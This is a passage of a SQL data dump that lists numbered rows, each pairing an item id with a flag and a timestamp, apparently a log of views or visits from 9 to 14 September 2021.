11:48:56'),(33277,2503,1,'2021-09-09','2021-09-09 11:50:28'),(33278,2503,1,'2021-09-09','2021-09-09 11:51:24'),(33279,3674,1,'2021-09-09','2021-09-09 11:51:30'),(33280,74,1,'2021-09-09','2021-09-09 11:52:09'),(33281,2503,1,'2021-09-09','2021-09-09 11:52:09'),(33282,2503,1,'2021-09-09','2021-09-09 11:53:25'),(33283,2503,1,'2021-09-09','2021-09-09 11:55:00'),(33284,1877,1,'2021-09-09','2021-09-09 11:57:31'),(33285,68,1,'2021-09-09','2021-09-09 11:58:44'),(33286,486,1,'2021-09-09','2021-09-09 12:00:42'),(33287,2503,1,'2021-09-09','2021-09-09 12:01:16'),(33288,72,1,'2021-09-09','2021-09-09 12:01:27'),(33289,80,1,'2021-09-09','2021-09-09 12:03:00'),(33290,68,1,'2021-09-09','2021-09-09 12:05:16'),(33291,91,1,'2021-09-09','2021-09-09 12:05:21'),(33292,335,1,'2021-09-09','2021-09-09 12:05:21'),(33293,68,1,'2021-09-09','2021-09-09 12:05:42'),(33294,3541,1,'2021-09-09','2021-09-09 12:05:42'),(33295,3541,1,'2021-09-09','2021-09-09 12:05:44'),(33296,2503,1,'2021-09-09','2021-09-09 12:05:45'),(33297,74,1,'2021-09-09','2021-09-09 12:06:15'),(33298,2503,1,'2021-09-09','2021-09-09 12:06:29'),(33299,2904,1,'2021-09-09','2021-09-09 12:06:36'),(33300,2503,1,'2021-09-09','2021-09-09 12:06:58'),(33301,2503,1,'2021-09-09','2021-09-09 12:07:19'),(33302,87,1,'2021-09-09','2021-09-09 12:07:20'),(33303,2503,1,'2021-09-09','2021-09-09 12:07:31'),(33304,488,1,'2021-09-09','2021-09-09 12:07:37'),(33305,2503,1,'2021-09-09','2021-09-09 12:07:44'),(33306,68,1,'2021-09-09','2021-09-09 12:08:21'),(33307,2503,1,'2021-09-09','2021-09-09 12:08:47'),(33308,335,1,'2021-09-09','2021-09-09 12:08:50'),(33309,87,1,'2021-09-09','2021-09-09 12:10:41'),(33310,2904,1,'2021-09-09','2021-09-09 12:10:41'),(33311,68,1,'2021-09-09','2021-09-09 12:11:24'),(33312,87,1,'2021-09-09','2021-09-09 12:11:59'),(33313,2503,1,'2021-09-09','2021-09-09 12:12:43'),(33314,2503,1,'2021-09-09','2021-09-09 12:12:57'),(33315,2503,1,'2021-09-09','2021-09-09 12:13:05'),(33316,2503,1,'2021-09-09','2021-09-09 12:14:41'),(33317,2904,1,'2021-09-09','2021-09-09 12:19:08'),(33318,2503,1,'2021-09-09','2021-09-09 12:20:41'),(33319,2904,1,'2021-09-09','2021-09-09 12:21:22'),(33320,87,1,'2021-09-09','2021-09-09 12:23:29'),(33321,2503,1,'2021-09-09','2021-09-09 12:27:21'),(33322,2503,1,'2021-09-09','2021-09-09 12:28:42'),(33323,3800,1,'2021-09-09','2021-09-09 12:32:51'),(33324,2503,1,'2021-09-09','2021-09-09 12:56:41'),(33325,2503,1,'2021-09-09','2021-09-09 12:56:45'),(33326,2503,1,'2021-09-09','2021-09-09 13:00:51'),(33327,2503,1,'2021-09-09','2021-09-09 13:02:48'),(33328,2503,1,'2021-09-09','2021-09-09 13:03:07'),(33329,2503,1,'2021-09-09','2021-09-09 13:03:45'),(33330,2503,1,'2021-09-09','2021-09-09 13:10:29'),(33331,72,1,'2021-09-09','2021-09-09 13:11:05'),(33332,2503,1,'2021-09-09','2021-09-09 13:11:53'),(33333,2503,1,'2021-09-09','2021-09-09 13:30:11'),(33334,84,1,'2021-09-09','2021-09-09 13:30:22'),(33335,1598,1,'2021-09-09','2021-09-09 13:30:32'),(33336,80,1,'2021-09-09','2021-09-09 13:39:18'),(33337,80,1,'2021-09-09','2021-09-09 13:43:19'),(33338,80,1,'2021-09-09','2021-09-09 13:52:53'),(33339,2503,1,'2021-09-09','2021-09-09 14:30:28'),(33340,3781,1,'2021-09-09','2021-09-09 14:43:28'),(33341,110,1,'2021-09-09','2021-09-09 14:51:11'),(33342,89,1,'2021-09-09','2021-09-09 14:54:34'),(33343,1606,1,'2021-09-09','2021-09-09 14:55:10'),(33344,89,1,'2021-09-09','2021-09-09 14:56:14'),(33345,2503,1,'2021-09-09','2021-09-09 14:59:28'),(33346,108,1,'2021-09-09','2021-09-09 15:05:16'),(33347,108,1,'2021-09-09','2021-09-09 15:06:28'),(33348,2503,1,'2021-09-09','2021-09-09 15:07:25'),(33349,2503,1,'2021-09-09','2021-09-09 15:08:21'),(33350,469,1,'2021-09-09','2021-09-09 15:08:35'),(33351,2159,1,'2021-09-09','2021-09-09 15:12:59'),(33352,2813,1,'2021-09-09','2021-09-09 15:16:01'),(33353,68,1,'2021-09-09','2021-09-09 15:17:18'),(33354,1718,1,'2021-09-09','2021-09-09 15:19:04'),(33355,2769,1,'2021-09-09','2021-09-09 15:28:37'),(33356,1592,1,'2021-09-09','2021-09-09 15:30:09'),(33357,2503,1,'2021-09-09','2021-09-09 15:32:18'),(33358,2503,1,'2021-09-09','2021-09-09 15:38:23'),(33359,3781,1,'2021-09-09','2021-09-09 15:50:52'),(33360,1600,1,'2021-09-09','2021-09-09 15:54:30'),(33361,2293,1,'2021-09-09','2021-09-09 16:39:14'),(33362,89,1,'2021-09-09','2021-09-09 16:46:50'),(33363,2769,1,'2021-09-09','2021-09-09 16:59:20'),(33364,2769,1,'2021-09-09','2021-09-09 17:00:06'),(33365,1602,1,'2021-09-09','2021-09-09 17:03:23'),(33366,2658,1,'2021-09-09','2021-09-09 17:24:21'),(33367,1614,1,'2021-09-09','2021-09-09 17:34:00'),(33368,2801,1,'2021-09-09','2021-09-09 17:42:36'),(33369,2309,1,'2021-09-09','2021-09-09 17:55:42'),(33370,1872,1,'2021-09-09','2021-09-09 18:12:36'),(33371,2410,1,'2021-09-09','2021-09-09 18:18:14'),(33372,1596,1,'2021-09-09','2021-09-09 18:24:15'),(33373,1602,1,'2021-09-09','2021-09-09 18:45:29'),(33374,477,1,'2021-09-09','2021-09-09 18:47:06'),(33375,3482,1,'2021-09-09','2021-09-09 19:03:17'),(33376,1582,1,'2021-09-09','2021-09-09 19:22:18'),(33377,1718,1,'2021-09-09','2021-09-09 19:44:58'),(33378,1586,1,'2021-09-09','2021-09-09 19:44:59'),(33379,3267,1,'2021-09-09','2021-09-09 20:20:13'),(33380,3781,1,'2021-09-09','2021-09-09 20:23:00'),(33381,3045,1,'2021-09-09','2021-09-09 21:07:06'),(33382,1602,1,'2021-09-09','2021-09-09 21:24:44'),(33383,89,1,'2021-09-09','2021-09-09 21:51:45'),(33384,1544,1,'2021-09-09','2021-09-09 21:51:54'),(33385,2658,1,'2021-09-09','2021-09-09 21:59:30'),(33386,89,1,'2021-09-09','2021-09-09 22:02:30'),(33387,1586,1,'2021-09-09','2021-09-09 22:23:19'),(33388,1582,1,'2021-09-09','2021-09-09 22:41:42'),(33389,1582,1,'2021-09-09','2021-09-09 22:41:54'),(33390,110,1,'2021-09-09','2021-09-09 22:46:16'),(33391,2804,1,'2021-09-09','2021-09-09 23:00:43'),(33392,2457,1,'2021-09-09','2021-09-09 23:04:07'),(33393,2804,1,'2021-09-09','2021-09-09 23:32:27'),(33394,3721,1,'2021-09-09','2021-09-09 23:54:27'),(33395,1588,1,'2021-09-10','2021-09-10 00:15:37'),(33396,2410,1,'2021-09-10','2021-09-10 01:03:01'),(33397,1582,1,'2021-09-10','2021-09-10 01:16:16'),(33398,1588,1,'2021-09-10','2021-09-10 01:37:28'),(33399,2813,1,'2021-09-10','2021-09-10 02:56:15'),(33400,2309,1,'2021-09-10','2021-09-10 03:00:20'),(33401,3307,1,'2021-09-10','2021-09-10 03:00:58'),(33402,2309,1,'2021-09-10','2021-09-10 03:28:00'),(33403,1600,1,'2021-09-10','2021-09-10 03:34:32'),(33404,1718,1,'2021-09-10','2021-09-10 03:43:32'),(33405,469,1,'2021-09-10','2021-09-10 04:28:19'),(33406,1596,1,'2021-09-10','2021-09-10 05:40:01'),(33407,1734,1,'2021-09-10','2021-09-10 06:35:01'),(33408,1606,1,'2021-09-10','2021-09-10 06:35:13'),(33409,2503,1,'2021-09-10','2021-09-10 06:55:08'),(33410,3901,1,'2021-09-10','2021-09-10 06:56:20'),(33411,3901,1,'2021-09-10','2021-09-10 07:00:02'),(33412,3045,1,'2021-09-10','2021-09-10 07:06:12'),(33413,89,1,'2021-09-10','2021-09-10 07:08:45'),(33414,1582,1,'2021-09-10','2021-09-10 07:08:50'),(33415,89,1,'2021-09-10','2021-09-10 07:16:15'),(33416,1602,1,'2021-09-10','2021-09-10 07:17:54'),(33417,1582,1,'2021-09-10','2021-09-10 07:20:46'),(33418,1606,1,'2021-09-10','2021-09-10 07:36:41'),(33419,80,1,'2021-09-10','2021-09-10 07:59:40'),(33420,1588,1,'2021-09-10','2021-09-10 08:10:51'),(33421,2813,1,'2021-09-10','2021-09-10 08:17:35'),(33422,2503,1,'2021-09-10','2021-09-10 08:20:56'),(33423,68,1,'2021-09-10','2021-09-10 09:14:41'),(33424,2503,1,'2021-09-10','2021-09-10 09:14:54'),(33425,3790,1,'2021-09-10','2021-09-10 09:47:14'),(33426,3482,1,'2021-09-10','2021-09-10 09:55:23'),(33427,1604,1,'2021-09-10','2021-09-10 09:55:51'),(33428,1596,1,'2021-09-10','2021-09-10 10:15:35'),(33429,2503,1,'2021-09-10','2021-09-10 10:18:20'),(33430,2503,1,'2021-09-10','2021-09-10 10:23:55'),(33431,1877,1,'2021-09-10','2021-09-10 10:28:54'),(33432,2503,1,'2021-09-10','2021-09-10 10:29:06'),(33433,87,1,'2021-09-10','2021-09-10 10:34:05'),(33434,74,1,'2021-09-10','2021-09-10 10:35:09'),(33435,89,1,'2021-09-10','2021-09-10 10:35:27'),(33436,1600,1,'2021-09-10','2021-09-10 10:44:03'),(33437,1598,1,'2021-09-10','2021-09-10 10:47:53'),(33438,108,1,'2021-09-10','2021-09-10 10:49:15'),(33439,335,1,'2021-09-10','2021-09-10 10:50:52'),(33440,84,1,'2021-09-10','2021-09-10 10:53:43'),(33441,89,1,'2021-09-10','2021-09-10 10:54:44'),(33442,72,1,'2021-09-10','2021-09-10 11:03:54'),(33443,4292,1,'2021-09-10','2021-09-10 11:38:32'),(33444,4292,1,'2021-09-10','2021-09-10 11:39:01'),(33445,4295,1,'2021-09-10','2021-09-10 11:42:49'),(33446,4295,1,'2021-09-10','2021-09-10 11:44:09'),(33447,89,1,'2021-09-10','2021-09-10 11:58:21'),(33448,89,1,'2021-09-10','2021-09-10 11:58:35'),(33449,4301,1,'2021-09-10','2021-09-10 11:58:57'),(33450,91,1,'2021-09-10','2021-09-10 12:00:25'),(33451,91,1,'2021-09-10','2021-09-10 12:07:37'),(33452,91,1,'2021-09-10','2021-09-10 12:11:48'),(33453,1872,1,'2021-09-10','2021-09-10 12:14:57'),(33454,2503,1,'2021-09-10','2021-09-10 12:16:23'),(33455,108,1,'2021-09-10','2021-09-10 12:21:17'),(33456,1586,1,'2021-09-10','2021-09-10 12:23:37'),(33457,1718,1,'2021-09-10','2021-09-10 12:36:31'),(33458,76,1,'2021-09-10','2021-09-10 12:49:05'),(33459,1602,1,'2021-09-10','2021-09-10 12:50:59'),(33460,68,1,'2021-09-10','2021-09-10 12:58:02'),(33461,3041,1,'2021-09-10','2021-09-10 12:59:14'),(33462,72,1,'2021-09-10','2021-09-10 12:59:56'),(33463,474,1,'2021-09-10','2021-09-10 13:02:20'),(33464,80,1,'2021-09-10','2021-09-10 13:05:01'),(33465,89,1,'2021-09-10','2021-09-10 13:40:16'),(33466,80,1,'2021-09-10','2021-09-10 13:47:30'),(33467,89,1,'2021-09-10','2021-09-10 13:47:43'),(33468,84,1,'2021-09-10','2021-09-10 13:54:32'),(33469,2503,1,'2021-09-10','2021-09-10 13:55:07'),(33470,1604,1,'2021-09-10','2021-09-10 13:55:26'),(33471,1586,1,'2021-09-10','2021-09-10 14:05:15'),(33472,2965,1,'2021-09-10','2021-09-10 14:08:44'),(33473,80,1,'2021-09-10','2021-09-10 14:46:19'),(33474,87,1,'2021-09-10','2021-09-10 14:49:53'),(33475,91,1,'2021-09-10','2021-09-10 14:50:35'),(33476,72,1,'2021-09-10','2021-09-10 15:07:08'),(33477,2989,1,'2021-09-10','2021-09-10 15:08:43'),(33478,91,1,'2021-09-10','2021-09-10 15:15:58'),(33479,3764,1,'2021-09-10','2021-09-10 15:19:30'),(33480,84,1,'2021-09-10','2021-09-10 15:19:55'),(33481,89,1,'2021-09-10','2021-09-10 15:20:26'),(33482,91,1,'2021-09-10','2021-09-10 15:20:46'),(33483,3285,1,'2021-09-10','2021-09-10 15:22:30'),(33484,3285,1,'2021-09-10','2021-09-10 15:22:31'),(33485,2503,1,'2021-09-10','2021-09-10 15:25:26'),(33486,2503,1,'2021-09-10','2021-09-10 15:27:22'),(33487,1602,1,'2021-09-10','2021-09-10 15:27:44'),(33488,2503,1,'2021-09-10','2021-09-10 15:28:47'),(33489,72,1,'2021-09-10','2021-09-10 15:31:15'),(33490,2503,1,'2021-09-10','2021-09-10 15:32:02'),(33491,91,1,'2021-09-10','2021-09-10 15:32:54'),(33492,3257,1,'2021-09-10','2021-09-10 15:38:01'),(33493,3482,1,'2021-09-10','2021-09-10 15:40:56'),(33494,1608,1,'2021-09-10','2021-09-10 15:48:31'),(33495,2769,1,'2021-09-10','2021-09-10 15:49:44'),(33496,2813,1,'2021-09-10','2021-09-10 15:51:24'),(33497,2813,1,'2021-09-10','2021-09-10 15:53:04'),(33498,89,1,'2021-09-10','2021-09-10 16:07:16'),(33499,1600,1,'2021-09-10','2021-09-10 16:07:34'),(33500,1598,1,'2021-09-10','2021-09-10 16:31:26'),(33501,3030,1,'2021-09-10','2021-09-10 17:06:31'),(33502,3034,1,'2021-09-10','2021-09-10 17:07:54'),(33503,2309,1,'2021-09-10','2021-09-10 17:16:35'),(33504,2609,1,'2021-09-10','2021-09-10 17:41:56'),(33505,468,1,'2021-09-10','2021-09-10 17:56:27'),(33506,1588,1,'2021-09-10','2021-09-10 17:57:25'),(33507,3698,1,'2021-09-10','2021-09-10 18:11:08'),(33508,1598,1,'2021-09-10','2021-09-10 18:30:31'),(33509,1598,1,'2021-09-10','2021-09-10 18:36:35'),(33510,1592,1,'2021-09-10','2021-09-10 18:54:22'),(33511,1728,1,'2021-09-10','2021-09-10 19:00:39'),(33512,1728,1,'2021-09-10','2021-09-10 19:00:53'),(33513,1728,1,'2021-09-10','2021-09-10 19:01:08'),(33514,1728,1,'2021-09-10','2021-09-10 19:01:29'),(33515,91,1,'2021-09-10','2021-09-10 19:04:37'),(33516,1602,1,'2021-09-10','2021-09-10 19:04:55'),(33517,1602,1,'2021-09-10','2021-09-10 19:06:12'),(33518,469,1,'2021-09-10','2021-09-10 19:08:55'),(33519,1877,1,'2021-09-10','2021-09-10 19:27:50'),(33520,1594,1,'2021-09-10','2021-09-10 19:30:05'),(33521,1600,1,'2021-09-10','2021-09-10 20:03:57'),(33522,470,1,'2021-09-10','2021-09-10 20:22:55'),(33523,3045,1,'2021-09-10','2021-09-10 21:35:42'),(33524,474,1,'2021-09-10','2021-09-10 21:58:12'),(33525,80,1,'2021-09-10','2021-09-10 22:00:20'),(33526,1600,1,'2021-09-10','2021-09-10 22:19:03'),(33527,3072,1,'2021-09-10','2021-09-10 22:25:26'),(33528,3735,1,'2021-09-10','2021-09-10 22:32:38'),(33529,3023,1,'2021-09-10','2021-09-10 22:52:22'),(33530,3698,1,'2021-09-10','2021-09-10 23:01:09'),(33531,3698,1,'2021-09-10','2021-09-10 23:10:09'),(33532,84,1,'2021-09-10','2021-09-10 23:37:27'),(33533,3482,1,'2021-09-11','2021-09-11 02:27:53'),(33534,89,1,'2021-09-11','2021-09-11 02:32:13'),(33535,1588,1,'2021-09-11','2021-09-11 02:37:55'),(33536,2309,1,'2021-09-11','2021-09-11 03:56:57'),(33537,3752,1,'2021-09-11','2021-09-11 03:59:27'),(33538,1602,1,'2021-09-11','2021-09-11 04:50:40'),(33539,1602,1,'2021-09-11','2021-09-11 04:50:42'),(33540,468,1,'2021-09-11','2021-09-11 05:17:45'),(33541,470,1,'2021-09-11','2021-09-11 05:58:57'),(33542,1594,1,'2021-09-11','2021-09-11 06:19:33'),(33543,3267,1,'2021-09-11','2021-09-11 06:48:32'),(33544,1594,1,'2021-09-11','2021-09-11 07:06:20'),(33545,2609,1,'2021-09-11','2021-09-11 07:18:23'),(33546,3045,1,'2021-09-11','2021-09-11 07:29:09'),(33547,3489,1,'2021-09-11','2021-09-11 07:42:22'),(33548,76,1,'2021-09-11','2021-09-11 08:19:20'),(33549,1600,1,'2021-09-11','2021-09-11 08:19:38'),(33550,1600,1,'2021-09-11','2021-09-11 08:24:22'),(33551,1602,1,'2021-09-11','2021-09-11 08:44:01'),(33552,1739,1,'2021-09-11','2021-09-11 08:49:37'),(33553,1877,1,'2021-09-11','2021-09-11 09:09:46'),(33554,1600,1,'2021-09-11','2021-09-11 09:50:23'),(33555,80,1,'2021-09-11','2021-09-11 10:03:06'),(33556,3005,1,'2021-09-11','2021-09-11 10:41:14'),(33557,3127,1,'2021-09-11','2021-09-11 11:07:22'),(33558,1588,1,'2021-09-11','2021-09-11 11:46:04'),(33559,2309,1,'2021-09-11','2021-09-11 11:46:43'),(33560,1718,1,'2021-09-11','2021-09-11 12:36:50'),(33561,3127,1,'2021-09-11','2021-09-11 12:40:09'),(33562,1596,1,'2021-09-11','2021-09-11 12:46:33'),(33563,1588,1,'2021-09-11','2021-09-11 13:57:33'),(33564,2813,1,'2021-09-11','2021-09-11 14:14:11'),(33565,3482,1,'2021-09-11','2021-09-11 15:48:05'),(33566,1877,1,'2021-09-11','2021-09-11 17:09:00'),(33567,1602,1,'2021-09-11','2021-09-11 18:11:31'),(33568,1600,1,'2021-09-11','2021-09-11 18:11:54'),(33569,2801,1,'2021-09-11','2021-09-11 18:19:15'),(33570,3004,1,'2021-09-11','2021-09-11 18:26:45'),(33571,3004,1,'2021-09-11','2021-09-11 18:26:48'),(33572,477,1,'2021-09-11','2021-09-11 18:29:27'),(33573,2609,1,'2021-09-11','2021-09-11 18:32:06'),(33574,3045,1,'2021-09-11','2021-09-11 18:34:19'),(33575,1592,1,'2021-09-11','2021-09-11 18:39:44'),(33576,89,1,'2021-09-11','2021-09-11 18:39:49'),(33577,80,1,'2021-09-11','2021-09-11 18:42:29'),(33578,2813,1,'2021-09-11','2021-09-11 18:46:48'),(33579,3267,1,'2021-09-11','2021-09-11 18:47:17'),(33580,80,1,'2021-09-11','2021-09-11 18:54:26'),(33581,1734,1,'2021-09-11','2021-09-11 19:03:14'),(33582,3710,1,'2021-09-11','2021-09-11 19:06:56'),(33583,1600,1,'2021-09-11','2021-09-11 19:28:20'),(33584,487,1,'2021-09-11','2021-09-11 19:28:50'),(33585,3781,1,'2021-09-11','2021-09-11 19:30:12'),(33586,2309,1,'2021-09-11','2021-09-11 19:46:06'),(33587,479,1,'2021-09-11','2021-09-11 19:54:26'),(33588,3489,1,'2021-09-11','2021-09-11 21:17:53'),(33589,3038,1,'2021-09-11','2021-09-11 21:23:10'),(33590,1718,1,'2021-09-11','2021-09-11 21:58:09'),(33591,1588,1,'2021-09-12','2021-09-12 03:09:35'),(33592,3124,1,'2021-09-12','2021-09-12 03:24:25'),(33593,2813,1,'2021-09-12','2021-09-12 03:59:38'),(33594,3752,1,'2021-09-12','2021-09-12 04:20:04'),(33595,1594,1,'2021-09-12','2021-09-12 04:29:28'),(33596,1602,1,'2021-09-12','2021-09-12 04:33:11'),(33597,3045,1,'2021-09-12','2021-09-12 04:33:27'),(33598,1596,1,'2021-09-12','2021-09-12 04:50:35'),(33599,2971,1,'2021-09-12','2021-09-12 04:59:27'),(33600,2309,1,'2021-09-12','2021-09-12 05:03:22'),(33601,473,1,'2021-09-12','2021-09-12 05:11:48'),(33602,3117,1,'2021-09-12','2021-09-12 05:25:37'),(33603,80,1,'2021-09-12','2021-09-12 05:33:04'),(33604,1600,1,'2021-09-12','2021-09-12 05:33:06'),(33605,1602,1,'2021-09-12','2021-09-12 05:42:04'),(33606,1588,1,'2021-09-12','2021-09-12 06:00:26'),(33607,2813,1,'2021-09-12','2021-09-12 06:10:28'),(33608,80,1,'2021-09-12','2021-09-12 06:24:25'),(33609,2161,1,'2021-09-12','2021-09-12 06:33:05'),(33610,1594,1,'2021-09-12','2021-09-12 06:55:32'),(33611,1606,1,'2021-09-12','2021-09-12 07:27:45'),(33612,2161,1,'2021-09-12','2021-09-12 07:55:30'),(33613,2804,1,'2021-09-12','2021-09-12 08:27:08'),(33614,1718,1,'2021-09-12','2021-09-12 09:10:53'),(33615,89,1,'2021-09-12','2021-09-12 09:12:02'),(33616,80,1,'2021-09-12','2021-09-12 09:17:33'),(33617,3789,1,'2021-09-12','2021-09-12 10:05:45'),(33618,2410,1,'2021-09-12','2021-09-12 10:41:06'),(33619,2165,1,'2021-09-12','2021-09-12 10:55:04'),(33620,2165,1,'2021-09-12','2021-09-12 10:55:13'),(33621,2165,1,'2021-09-12','2021-09-12 10:55:20'),(33622,2165,1,'2021-09-12','2021-09-12 10:55:45'),(33623,2165,1,'2021-09-12','2021-09-12 11:00:39'),(33624,1596,1,'2021-09-12','2021-09-12 11:00:57'),(33625,2309,1,'2021-09-12','2021-09-12 11:04:30'),(33626,1588,1,'2021-09-12','2021-09-12 11:41:47'),(33627,3482,1,'2021-09-12','2021-09-12 12:03:28'),(33628,1582,1,'2021-09-12','2021-09-12 12:19:53'),(33629,3027,1,'2021-09-12','2021-09-12 13:04:58'),(33630,2813,1,'2021-09-12','2021-09-12 13:58:53'),(33631,1588,1,'2021-09-12','2021-09-12 16:29:21'),(33632,4301,1,'2021-09-12','2021-09-12 16:55:51'),(33633,1766,1,'2021-09-12','2021-09-12 17:19:52'),(33634,3482,1,'2021-09-12','2021-09-12 18:09:50'),(33635,2309,1,'2021-09-12','2021-09-12 18:14:52'),(33636,1582,1,'2021-09-12','2021-09-12 18:37:06'),(33637,3774,1,'2021-09-12','2021-09-12 18:55:58'),(33638,472,1,'2021-09-12','2021-09-12 18:56:27'),(33639,3752,1,'2021-09-12','2021-09-12 19:49:17'),(33640,3789,1,'2021-09-12','2021-09-12 19:56:21'),(33641,2813,1,'2021-09-12','2021-09-12 19:59:21'),(33642,472,1,'2021-09-12','2021-09-12 20:15:41'),(33643,3267,1,'2021-09-12','2021-09-12 20:16:12'),(33644,1778,1,'2021-09-12','2021-09-12 20:29:10'),(33645,1718,1,'2021-09-12','2021-09-12 21:42:23'),(33646,1582,1,'2021-09-12','2021-09-12 22:44:32'),(33647,1588,1,'2021-09-12','2021-09-12 22:46:30'),(33648,2989,1,'2021-09-12','2021-09-12 23:06:03'),(33649,468,1,'2021-09-12','2021-09-12 23:08:11'),(33650,1766,1,'2021-09-12','2021-09-12 23:29:34'),(33651,2813,1,'2021-09-12','2021-09-12 23:36:32'),(33652,1596,1,'2021-09-12','2021-09-12 23:46:29'),(33653,570,1,'2021-09-12','2021-09-12 23:59:33'),(33654,2457,1,'2021-09-13','2021-09-13 00:34:52'),(33655,3107,1,'2021-09-13','2021-09-13 01:03:33'),(33656,1588,1,'2021-09-13','2021-09-13 02:06:46'),(33657,1718,1,'2021-09-13','2021-09-13 02:16:38'),(33658,1602,1,'2021-09-13','2021-09-13 02:21:49'),(33659,2904,1,'2021-09-13','2021-09-13 02:27:40'),(33660,2904,1,'2021-09-13','2021-09-13 02:28:36'),(33661,1602,1,'2021-09-13','2021-09-13 02:28:36'),(33662,1602,1,'2021-09-13','2021-09-13 02:31:01'),(33663,2904,1,'2021-09-13','2021-09-13 02:31:55'),(33664,2904,1,'2021-09-13','2021-09-13 02:33:10'),(33665,2904,1,'2021-09-13','2021-09-13 02:33:19'),(33666,1602,1,'2021-09-13','2021-09-13 02:33:21'),(33667,76,1,'2021-09-13','2021-09-13 02:50:06'),(33668,472,1,'2021-09-13','2021-09-13 04:01:30'),(33669,2804,1,'2021-09-13','2021-09-13 04:08:39'),(33670,2309,1,'2021-09-13','2021-09-13 04:24:00'),(33671,72,1,'2021-09-13','2021-09-13 04:30:18'),(33672,3034,1,'2021-09-13','2021-09-13 04:46:30'),(33673,3117,1,'2021-09-13','2021-09-13 05:01:34'),(33674,2159,1,'2021-09-13','2021-09-13 05:01:36'),(33675,470,1,'2021-09-13','2021-09-13 05:19:33'),(33676,2309,1,'2021-09-13','2021-09-13 05:37:33'),(33677,3079,1,'2021-09-13','2021-09-13 05:46:33'),(33678,3664,1,'2021-09-13','2021-09-13 06:02:35'),(33679,2989,1,'2021-09-13','2021-09-13 06:25:36'),(33680,1600,1,'2021-09-13','2021-09-13 06:33:48'),(33681,1544,1,'2021-09-13','2021-09-13 06:49:37'),(33682,3034,1,'2021-09-13','2021-09-13 06:55:32'),(33683,3079,1,'2021-09-13','2021-09-13 07:40:32'),(33684,1586,1,'2021-09-13','2021-09-13 07:56:46'),(33685,89,1,'2021-09-13','2021-09-13 09:13:20'),(33686,1602,1,'2021-09-13','2021-09-13 09:13:37'),(33687,2813,1,'2021-09-13','2021-09-13 09:30:02'),(33688,1728,1,'2021-09-13','2021-09-13 09:35:27'),(33689,1596,1,'2021-09-13','2021-09-13 09:49:22'),(33690,2309,1,'2021-09-13','2021-09-13 10:00:52'),(33691,3764,1,'2021-09-13','2021-09-13 10:10:30'),(33692,3781,1,'2021-09-13','2021-09-13 10:33:05'),(33693,3781,1,'2021-09-13','2021-09-13 10:34:52'),(33694,468,1,'2021-09-13','2021-09-13 10:40:33'),(33695,1588,1,'2021-09-13','2021-09-13 10:49:18'),(33696,1598,1,'2021-09-13','2021-09-13 11:48:41'),(33697,1598,1,'2021-09-13','2021-09-13 11:49:25'),(33698,1598,1,'2021-09-13','2021-09-13 11:58:35'),(33699,1598,1,'2021-09-13','2021-09-13 12:02:06'),(33700,1598,1,'2021-09-13','2021-09-13 12:03:14'),(33701,1606,1,'2021-09-13','2021-09-13 12:18:57'),(33702,1608,1,'2021-09-13','2021-09-13 12:20:12'),(33703,2813,1,'2021-09-13','2021-09-13 12:49:51'),(33704,3267,1,'2021-09-13','2021-09-13 13:00:08'),(33705,3030,1,'2021-09-13','2021-09-13 13:14:11'),(33706,76,1,'2021-09-13','2021-09-13 13:14:55'),(33707,76,1,'2021-09-13','2021-09-13 13:15:00'),(33708,72,1,'2021-09-13','2021-09-13 13:16:13'),(33709,76,1,'2021-09-13','2021-09-13 13:17:08'),(33710,2503,1,'2021-09-13','2021-09-13 13:17:29'),(33711,1602,1,'2021-09-13','2021-09-13 13:20:58'),(33712,3482,1,'2021-09-13','2021-09-13 13:23:23'),(33713,1602,1,'2021-09-13','2021-09-13 13:23:58'),(33714,3030,1,'2021-09-13','2021-09-13 13:24:00'),(33715,1602,1,'2021-09-13','2021-09-13 13:26:57'),(33716,91,1,'2021-09-13','2021-09-13 13:50:09'),(33717,1588,1,'2021-09-13','2021-09-13 14:03:38'),(33718,108,1,'2021-09-13','2021-09-13 14:19:58'),(33719,2309,1,'2021-09-13','2021-09-13 15:00:16'),(33720,2503,1,'2021-09-13','2021-09-13 15:01:49'),(33721,2503,1,'2021-09-13','2021-09-13 15:03:20'),(33722,2748,1,'2021-09-13','2021-09-13 15:06:19'),(33723,2503,1,'2021-09-13','2021-09-13 15:11:46'),(33724,3261,1,'2021-09-13','2021-09-13 15:45:07'),(33725,1718,1,'2021-09-13','2021-09-13 16:27:26'),(33726,3752,1,'2021-09-13','2021-09-13 16:28:02'),(33727,3261,1,'2021-09-13','2021-09-13 16:30:05'),(33728,3117,1,'2021-09-13','2021-09-13 16:31:36'),(33729,89,1,'2021-09-13','2021-09-13 16:49:04'),(33730,3240,1,'2021-09-13','2021-09-13 16:49:06'),(33731,3691,1,'2021-09-13','2021-09-13 17:15:07'),(33732,1582,1,'2021-09-13','2021-09-13 18:08:38'),(33733,3752,1,'2021-09-13','2021-09-13 18:58:46'),(33734,1598,1,'2021-09-13','2021-09-13 19:04:54'),(33735,89,1,'2021-09-13','2021-09-13 19:47:57'),(33736,1582,1,'2021-09-13','2021-09-13 19:48:04'),(33737,1707,1,'2021-09-13','2021-09-13 20:08:50'),(33738,1718,1,'2021-09-13','2021-09-13 20:18:52'),(33739,1588,1,'2021-09-13','2021-09-13 20:59:21'),(33740,2503,1,'2021-09-13','2021-09-13 23:06:21'),(33741,84,1,'2021-09-13','2021-09-13 23:54:12'),(33742,2309,1,'2021-09-14','2021-09-14 00:45:04'),(33743,89,1,'2021-09-14','2021-09-14 01:04:09'),(33744,68,1,'2021-09-14','2021-09-14 01:28:00'),(33745,87,1,'2021-09-14','2021-09-14 01:29:40'),(33746,488,1,'2021-09-14','2021-09-14 01:30:41'),(33747,87,1,'2021-09-14','2021-09-14 01:31:26'),(33748,2159,1,'2021-09-14','2021-09-14 01:36:11'),(33749,1596,1,'2021-09-14','2021-09-14 01:40:11'),(33750,1596,1,'2021-09-14','2021-09-14 01:41:46'),(33751,89,1,'2021-09-14','2021-09-14 01:45:59'),(33752,1582,1,'2021-09-14','2021-09-14 01:47:03'),(33753,91,1,'2021-09-14','2021-09-14 01:47:59'),(33754,68,1,'2021-09-14','2021-09-14 01:50:31'),(33755,3691,1,'2021-09-14','2021-09-14 02:10:30'),(33756,1588,1,'2021-09-14','2021-09-14 02:20:12'),(33757,76,1,'2021-09-14','2021-09-14 02:27:08'),(33758,72,1,'2021-09-14','2021-09-14 02:29:26'),(33759,335,1,'2021-09-14','2021-09-14 02:50:39'),(33760,3664,1,'2021-09-14','2021-09-14 03:04:14'),(33761,1582,1,'2021-09-14','2021-09-14 03:57:18'),(33762,2813,1,'2021-09-14','2021-09-14 04:00:37'),(33763,1594,1,'2021-09-14','2021-09-14 04:22:25'),(33764,472,1,'2021-09-14','2021-09-14 